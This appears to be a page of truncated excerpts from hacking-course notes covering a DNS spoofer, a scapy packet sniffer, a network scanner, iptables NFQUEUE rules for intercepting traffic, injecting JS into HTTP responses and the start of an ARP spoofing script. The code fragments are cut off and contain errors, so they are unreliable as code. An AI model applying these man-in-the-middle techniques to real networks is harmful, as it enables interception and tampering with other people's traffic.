WRITING A DNS SPOOFER
#DNS SERVER
PACKET_SNIFFER CODE: BASE#1 #!/usr/bin/env python import scapy.all as scapy def sniff (interface): scapy.sniff( iface =interface , store = False, prc =process_sniffed_packet) def process_sniffed_packet (packet): print (packet) sniff( "…
# Network scanner there Discover all devices on the network Display there IP addresss Display there MAC address THE VIRTUAL MACHINE[VM] REQUIRE AN EXTERNAL ADAPTER TO SEARCH IP/MAC ADDRESS THE INBUILT WIFI ADAPTER WOULD NOT WORK!! #CODES ifconfig th…
gzip IS use to compress HTML Encodings Therefore when the browser sends the response it will first compress the response to a gzip format send it to us! #IP-table FOR-REMOTE-PC -RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0 -RUN: iptables -…
# MODEFYING DATA IN HTTP-LAYER MOTIVE: EDIT REQUEST/RESPONSES REPLACE DOWNLOAD REQUEST INJECT CODE(HTML/JS) The Port number used for HTTP is 80 #IP-table FOR-REMOTE-PC -RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0 -RUN: iptables -I INPUT -j…
NOTE: WE TOOK AN EXAMPLE OF ETH0/IN VM CODE: ARP_SPOOFING_FILE_DRIVE #!/usr/bin/env python import scapy.all as scapy import time import sys def get_mac ( ip ): arp_request = scapy.ARP( pdst = ip ) broadcast = scapy.Ether( dst = "ff:ff:f…
Our website uses cookies to improve your experience. Learn more
Ok